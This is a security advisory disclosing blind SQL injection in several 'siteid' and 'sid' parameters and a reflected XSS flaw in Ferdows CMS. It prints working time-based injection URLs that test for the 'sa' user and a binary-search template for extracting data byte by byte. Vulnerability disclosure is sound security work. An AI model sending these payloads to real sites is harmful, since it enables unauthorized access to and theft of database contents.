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Ferdows CMS Pro <=1.1.0 and Ferdows CMS <=9.0.5 Multiple Vulnerabilities

########################## www.BugReport.ir #######################################
#                       AmnPardaz Security Research Team
# Title: Ferdows CMS Pro <=1.1.0 and Ferdows CMS <=9.0.5 Multiple Vulnerabilities
# Vendor: www.fcms.ir
# Exploit: Available
# Vulnerable Version: 1.1.0 (Pro) & 9.0.5 (CMS)
# Impact: Medium
# Original Advisory:    http://www.bugreport.ir/index_77.htm
# Fix: N/A

1. Description:

Ferdows CMS is a complete, fully featured CMS in ASP.NET language and using AJAX technology with MSSQL and became a powerful CMS having plenty of strong modules. This CMS is not open-source and is accessible for private use by the author company for designing their customer's websites.

2. Vulnerabilities:

2.1. Injection Flaws. Blind SQL Injection in "/about.aspx" and "/archive.aspx" and "/default1.aspx" in "siteid" parameter.
                2.1.1. Exploit:
                                                Check the exploit/POC section.

2.2. Injection Flaws. Blind SQL Injection in "/archive.aspx" in "sid" parameter.
                2.2.1. Exploit:
                                                Check the exploit/POC section.

2.3. Cross Site Scripting (XSS). Reflected XSS attack in "/showdata.aspx" in "dataid" parameter. (Post Method)
                2.3.1. Exploit:
                                                Check the exploit/POC section.

3. Exploits/PoCs:

Original Exploit URL: http://www.bugreport.ir/77/exploit.htm

3.1. Injection Flaws. Blind SQL Injection in "/about.aspx" and "/archive.aspx" and "/default1.aspx" in "siteid" parameter. 3.2. Injection Flaws. Blind SQL Injection in "/archive.aspx" in "sid" parameter.
                Check database username:
http://[URL]/default1.aspx?siteid=1'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'-- http://[URL]/archive.aspx?sid=19&siteid=1'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'-- http://[URL]/archive.aspx?sid=19'; IF SYSTEM_USER='sa' waitfor delay '00:00:10'--&siteid=1

                Binary Search Exploits:
http://[URL]/about.aspx?siteid=1'; IF ASCII(SUBSTRING((…),i,1)) > k waitfor delay '00:00:10'--

Note: In last POC, i is the i-th byte returned by the one-row subquery (…) and k is the current middle value of the binary search.

3.3. Cross Site Scripting (XSS). Reflected XSS attack in "/showdata.aspx" in "dataid" parameter. (POST METHOD)


4. Solution:

        Edit the source code to ensure that inputs are properly sanitized.

5. Credit:
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir